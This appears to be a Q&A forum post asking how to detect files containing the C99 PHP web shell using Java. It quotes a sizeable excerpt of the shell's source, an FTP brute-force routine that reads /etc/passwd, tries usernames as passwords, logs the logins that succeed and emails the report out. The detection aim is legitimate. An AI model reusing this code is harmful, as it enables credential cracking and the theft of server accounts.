# how to identify some codes in a file according to its function

Tags: java, php

I was given C99 codes, and what should I do is to find out the file with the C99 code in a bench of files.

In the c99 codes, I found some aggressive codes, which will do some hacks on other pcs.
**Now, my question is how to identify these code according to their function?**

For example, here is part of source codes in c99:

```
    function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
  {
   if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));}
   else {$true = true;}
   if ($true)
   {
    $sock = @ftp_connect($host,$port,$timeout);
    if (@ftp_login($sock,$login,$pass))
    {
     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
     ob_flush();
     return true;
    }
   }
  }
  if (!empty($submit))
  {
   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
   $fp = fopen("/etc/passwd","r");
   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
   else
   {
    if ($fqb_logging)
    {
     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
     else {$fqb_logfp = false;}
     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
    }
    ob_flush();
    $i = $success = 0;
    $ftpquick_st = getmicrotime();
    while(!feof($fp))
    { 
     $str = explode(":",fgets($fp,2048));
     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
     {
      echo "<b>Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
      $fqb_log .= "Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
      $success++;
      ob_flush();
     }
     if ($i > $fqb_lenght) {break;}
     $i++;
    } 
    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
    fclose($fqb_logfp);
   }
  }
```

what I wanna do is to find a file with these code in java

Comment: An example or two would do wonders here.

Comment: @Keppil Hi, just re-edit, hope that will do

Comment: Duplicate to http://stackoverflow.com/questions/709744/how-to-find-a-similar-code-fragment

Comment: Is this tagged correctly, to me, this looks nothing like Java

Comment: @amadeus sorry, it's useless for me, i think

Comment: @PeskyGnat that's php code, i would like to use java

Comment: @Juslaing: are you trying to find pre-written java code that does what your PHP code is doing?  Why can't you just rewrite your PHP code in Java?